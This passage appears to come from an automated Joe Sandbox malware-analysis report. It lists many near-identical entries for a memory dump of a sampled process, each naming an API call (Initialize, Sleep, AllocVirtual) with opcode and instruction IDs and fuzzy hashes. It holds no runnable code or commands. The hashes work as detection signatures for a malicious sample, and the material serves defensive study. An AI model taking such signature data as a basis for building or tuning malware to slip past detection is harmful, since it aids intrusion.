                    • Instruction Fuzzy Hash: 05413C25A28502EDFF1A67F5BC12E3A2C8AFB80B11F24991DB183D9486EE38D5016071
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: de84cf29a8fd62ce38a3ac7031759c7eee9bf8c35c0b50143f56c40a00e56bd0
                    • Instruction ID: ce513fe54215bff22f93647fc85b1289a7477be28c023e7da0d634be1d584378
                    • Opcode Fuzzy Hash: de84cf29a8fd62ce38a3ac7031759c7eee9bf8c35c0b50143f56c40a00e56bd0
                    • Instruction Fuzzy Hash: 8F417876A14705EDEF05DBA4BC41F3C7EA9FB8170CF29D119A087AB162DE74C9019AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 1d645604c1a1c404572dfb6f431631895a4ee39c39789d6fee0d256497b66a6b
                    • Instruction ID: d9cb45078ba021de41019296a5f5f288c8d02c1ab7a32d13fd258b09b6ab9983
                    • Opcode Fuzzy Hash: 1d645604c1a1c404572dfb6f431631895a4ee39c39789d6fee0d256497b66a6b
                    • Instruction Fuzzy Hash: CA419B76A14201DDEF01DBA5BD42F3D7EA9FB81308F29D119A0879B163DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 0d28287d4a7922abe7909f51270f5554bb3293ed60572856a366e73dcb79f7c4
                    • Instruction ID: 38d2dbbc1ed05fac4d44c893b61258dae591e3d28f15f343b99b616b9d9f8571
                    • Opcode Fuzzy Hash: 0d28287d4a7922abe7909f51270f5554bb3293ed60572856a366e73dcb79f7c4
                    • Instruction Fuzzy Hash: 71315B25629502EDFF2A63F5BC12E3A2D4EFB81B15F28D91DB183D9483ED38D9016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: b4c3bc4f3a09729fe90bf56ebf48325c39a14f480c1811398c4fdfe6c6f78867
                    • Instruction ID: 0470c8c143c4c7239a48c605c5792bc51e41b1936007f9634f141c7b390a903e
                    • Opcode Fuzzy Hash: b4c3bc4f3a09729fe90bf56ebf48325c39a14f480c1811398c4fdfe6c6f78867
                    • Instruction Fuzzy Hash: 2E414B32A14205CEDF15DBA8FC81F2D7E99FB90308F25D625D043DB166DEB4C94096B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 78c4ce668bc14a0a7c077f3898c933bbd72d75491040a00ab9aa3b05715fdd6e
                    • Instruction ID: 77c4e1be8d760dac6e1dd50e01145ab38c4ccdab62151fdda7dbf78c17645ce1
                    • Opcode Fuzzy Hash: 78c4ce668bc14a0a7c077f3898c933bbd72d75491040a00ab9aa3b05715fdd6e
                    • Instruction Fuzzy Hash: 00310C25B28502ADFF6967F5BC12E3A2C4AFB81B15F18991DB183D9487ED38D6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 6c812450da667ef91aa4bc36ec31cf22562c813e5ce016a74f244c84a4aabfb6
                    • Instruction ID: a9322da2016e12222d9ec0df39daad911706db87c8233b39fbfd009ef887c0c4
                    • Opcode Fuzzy Hash: 6c812450da667ef91aa4bc36ec31cf22562c813e5ce016a74f244c84a4aabfb6
                    • Instruction Fuzzy Hash: 51313B25B28502ADFF2977F5BC12E3E2C4EFB81B11F24991DB183D9486EE38D6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 69810937cf8dd6d7afae2f3226f39df04c8055b5bb7d317543c1862063685c98
                    • Instruction ID: 49397f8e8b6222508baacf393795515fc9f7ce526907d95f661616de27ff6044
                    • Opcode Fuzzy Hash: 69810937cf8dd6d7afae2f3226f39df04c8055b5bb7d317543c1862063685c98
                    • Instruction Fuzzy Hash: BA417776A14305DDEF05DBA4AD41B3D7EAAFB80308F25E11990479B162DE7489019AB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 5c7978ccfa3aab9bb2358254a7b511aeb87a74bc646464c4e8df82c8fd74f9c4
                    • Instruction ID: 69862e08cdcbb8939f1db37ad13f3ca6bcf1b5276d7a00b23a1dd21a724f27f5
                    • Opcode Fuzzy Hash: 5c7978ccfa3aab9bb2358254a7b511aeb87a74bc646464c4e8df82c8fd74f9c4
                    • Instruction Fuzzy Hash: F4317876914305CDDF05DFA4AD81B2CBEAAFB80308F25D119D0879F1A2DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: b8e8fb016d8de286ceab7fcc401d983151fd6e590f9a097f5807e2646bb6db09
                    • Instruction ID: ed535cca892dabda9d5c4372d487b6a9dd6c72853e0e08c834972bc64ff7d020
                    • Opcode Fuzzy Hash: b8e8fb016d8de286ceab7fcc401d983151fd6e590f9a097f5807e2646bb6db09
                    • Instruction Fuzzy Hash: F2316776904305CEDF05DFA4AD81B2DBEA9FB80308F25E119D087AF1A2DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 41728e643d91c63cc06e9eb38a5aa92b4827d6ea1a926a6d512a1ea13076a8ea
                    • Instruction ID: 41c3ef6614c3489348b7219229474e30af9f3be2a395b30e5a67e571d56126c6
                    • Opcode Fuzzy Hash: 41728e643d91c63cc06e9eb38a5aa92b4827d6ea1a926a6d512a1ea13076a8ea
                    • Instruction Fuzzy Hash: 65214E35A28502DDEF2D67F4FC12A392D49FB80B11F18D91DB183D9492EE38D5016471
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 3f3c0cb22216bc1d4d37d73cb1b76a3ec2d58828a5ea3753d9766b42e69312e0
                    • Instruction ID: b2d5b57393c163180fd10e35c8d16b6cdc9d0906d030a4136d5c931f437bbde9
                    • Opcode Fuzzy Hash: 3f3c0cb22216bc1d4d37d73cb1b76a3ec2d58828a5ea3753d9766b42e69312e0
                    • Instruction Fuzzy Hash: 1E212C25628502EDEF6E67F4BC12A3A1C89FB80B55F28DD1DB183D9482ED39D6016471
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 71561392d4d8067ff90444031261ce5e75ba335fe1b5180300fa67dc93fbc04b
                    • Instruction ID: abf345a516701ae5c58efc637a2e44c4bd6c06d580ef4261649350f5b27697f0
                    • Opcode Fuzzy Hash: 71561392d4d8067ff90444031261ce5e75ba335fe1b5180300fa67dc93fbc04b
                    • Instruction Fuzzy Hash: 94318572A04205CEDF01DFA4AC81E2DBEA9FB8030CF69D114D0879B162DEB4890197B0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 5a9244b7db617b6d444f9f4c58634c16109b38a375df11579253416b8934bc97
                    • Instruction ID: e5e85f6841d347a1ca7a5045275214999b672f27f0c8837d291dd576154599e9
                    • Opcode Fuzzy Hash: 5a9244b7db617b6d444f9f4c58634c16109b38a375df11579253416b8934bc97
                    • Instruction Fuzzy Hash: AF215B26629502EDEF2A67F4BC12A3D1D49FB81715B28DD1DB183D9493ED38D601A072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 743db1ef30ed4ad0898f61bb3235822ef16331a2eca99231dc703896e40b9f58
                    • Instruction ID: 9650e7321e8765dcb3014b0802458d96548d750f6778e9a02fa067b902165c23
                    • Opcode Fuzzy Hash: 743db1ef30ed4ad0898f61bb3235822ef16331a2eca99231dc703896e40b9f58
                    • Instruction Fuzzy Hash: CC216871905205CEDF01DFA4A981E2DBFA9FB8130CF29D215D0879B1A6DAB4890197B0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: fedd77173f0f68c5afddafd12f9c380183e137179cf39233f9161bd744f89064
                    • Instruction ID: 8ab50cf5e1a1ba06f229f481601fc32b4743b798b53649de78c8b33ed79ef312
                    • Opcode Fuzzy Hash: fedd77173f0f68c5afddafd12f9c380183e137179cf39233f9161bd744f89064
                    • Instruction Fuzzy Hash: A9210A25A28502ADEF6967F5BC12A3A1C49FB81715B28AD1DB183D9487ED38C6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 51de3e645f225c32ace66936091dc14c7e19af588d1765a9ff836c4638613e73
                    • Instruction ID: b04d7303dca7adffef9b421cac983a69b0a394c1e3b1ef29036fb50edc07accc
                    • Opcode Fuzzy Hash: 51de3e645f225c32ace66936091dc14c7e19af588d1765a9ff836c4638613e73
                    • Instruction Fuzzy Hash: C4219B72900205CEDF01DFA4ED81E6DBEAAFB8030CF29D115D0479F166DEB4890097B0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: a4ddb456e16d676d7ddad0bf632ab18ea0a3fab2c526f2f4fad18b46aefe225a
                    • Instruction ID: 5d8d7b9786d79f4ba938c250b0a2857ccf14c731682750d917f9be994c728a1e
                    • Opcode Fuzzy Hash: a4ddb456e16d676d7ddad0bf632ab18ea0a3fab2c526f2f4fad18b46aefe225a
                    • Instruction Fuzzy Hash: B5112B26A28502DDEF6D77F5BC12A3E1C4EFB80715B24AD1EB183D9486EE38C6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 64bc72617dbddc16c178752d2fe5edcb444676b1f65a233cf60c070721219435
                    • Instruction ID: ace27bdd77f5129b5e23b1fc2af254b4db3f91f4500f2fa8c04b2e78d78a583a
                    • Opcode Fuzzy Hash: 64bc72617dbddc16c178752d2fe5edcb444676b1f65a233cf60c070721219435
                    • Instruction Fuzzy Hash: 55216572900205CEDF01DFA4E981E6DBEAAFB8030CF29D215D0479F266CFB489009BB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 091725af6dc5df62dc5a8191f0c2cc866ed3c675b6e12344e4e2024a4dce6300
                    • Instruction ID: da12785690c4432bb05d78fa81d885818d1b60cd0efc2cb767bbfb8208f01f04
                    • Opcode Fuzzy Hash: 091725af6dc5df62dc5a8191f0c2cc866ed3c675b6e12344e4e2024a4dce6300
                    • Instruction Fuzzy Hash: 58110C216285029DEF2D66F4BC1363D1D4AEB80B15F24DD2EB183D94D6DD38C6015031
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 3588f5e52ec049507abf0ce877314021c8aeaa653e7a2efcab5abb77f58e6a66
                    • Instruction ID: 58c885a76ad0046d88862ab773e1d4618b014c56f51197baf9d5e8132e9ad08f
                    • Opcode Fuzzy Hash: 3588f5e52ec049507abf0ce877314021c8aeaa653e7a2efcab5abb77f58e6a66
                    • Instruction Fuzzy Hash: 4A11293CE14217EEEF2A5BA08C06F7D6969FB91741F3D9049F08395041FE358A426A75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 85be102351366d93fe2279f64feb52b65cf98c892d2e949f85ed22989106f610
                    • Instruction ID: 70079a861d191f9c611fb17eb5b7e47874f7c091e0e437e14c41c526d552447e
                    • Opcode Fuzzy Hash: 85be102351366d93fe2279f64feb52b65cf98c892d2e949f85ed22989106f610
                    • Instruction Fuzzy Hash: 81112B226285029DEF2D67F4BC13A3E1D4AEB80714F24ED2EB183D9096DD38C6019032
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: afa958eb6614f35532fc18f8b7d6f9277d004c03702536b71b16386e4565304e
                    • Instruction ID: 6d294ec287cdc932930267f9f89c506be3d2d5d9dcfc4b32974423b9cb20a158
                    • Opcode Fuzzy Hash: afa958eb6614f35532fc18f8b7d6f9277d004c03702536b71b16386e4565304e
                    • Instruction Fuzzy Hash: E2113872900215CECF05DFA8E9C1A5DBFA9FB5030CF69D225C1479F166CBB48901CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: ed8ab764ffaa2b254a6b1054ac59e2026c5bdd62964111ca9fe22f3c2b99ec77
                    • Instruction ID: 687202c59a84bb7391ff02166c94e661900429d602556ad213aff7e88b0aaa15
                    • Opcode Fuzzy Hash: ed8ab764ffaa2b254a6b1054ac59e2026c5bdd62964111ca9fe22f3c2b99ec77
                    • Instruction Fuzzy Hash: 32116B3CD14213EDEF275B608C02ABD2E69FB92701F3C9199F08355041ED358A42AE75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 9ae37d4ba15672adf97898008dabe5696302885614b3422b4ee3e73c819dc622
                    • Instruction ID: b2a45f396671bdcc897dc19090fe21366116466d0c09b5b01f1f90f6ceef47a4
                    • Opcode Fuzzy Hash: 9ae37d4ba15672adf97898008dabe5696302885614b3422b4ee3e73c819dc622
                    • Instruction Fuzzy Hash: 95110472900215CECF45DFA8EAC5A5DBFA9FB5030CF65D225C147AF166CBB49901CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: da754e029dc0f317750cbeb8ba6861ef9e63b3ce74472296ec78becccf9029b0
                    • Instruction ID: 64a067ca84d24fba6f08b4bbd4b4c6db10ebb1407554fe64026d488419a603cb
                    • Opcode Fuzzy Hash: da754e029dc0f317750cbeb8ba6861ef9e63b3ce74472296ec78becccf9029b0
                    • Instruction Fuzzy Hash: 6701763CD00227EDEF2AABA08C06EBD2969FB51701F3C9189E043A5041EE348A056E75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 8f266b6260de0bbadf2dcaaad9793f405081b38a76fbd8e88fc609ffdb53df60
                    • Instruction ID: ce71b41d7f63bd1d5e27d7e3c5147dfe2480fca06facde81286007e39c60320a
                    • Opcode Fuzzy Hash: 8f266b6260de0bbadf2dcaaad9793f405081b38a76fbd8e88fc609ffdb53df60
                    • Instruction Fuzzy Hash: 3F01493CD00227DDEF2AABA08C06EBD696DFB51701F389089E14365041EE348A416E75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 4c4c3924c93d9f3240ae18658998b04fea34017ea5db1b964b647d844a0c4569
                    • Instruction ID: 0e16551a1439cddb9a16e2b610ac2d1bde36daa54daf6218d3660412a3c5e7ad
                    • Opcode Fuzzy Hash: 4c4c3924c93d9f3240ae18658998b04fea34017ea5db1b964b647d844a0c4569
                    • Instruction Fuzzy Hash: C9F02B3CC00227DDDF2A9BA0CC06AAC7679FB50701F3891DAE14766090EE318A415F75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 15b4a2bdf7af8b15b9897b5924ec2506858c9786ed1657813c228293555d8498
                    • Instruction ID: 32988a79880f730b94014a8ce95729f940d3f745dc9f31311a8aae9a236f85af
                    • Opcode Fuzzy Hash: 15b4a2bdf7af8b15b9897b5924ec2506858c9786ed1657813c228293555d8498
                    • Instruction Fuzzy Hash: 51F0B43CC002279EDF2A9BA4CC16AAD7A79FB50700F3890DAE14665090EE319A459F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions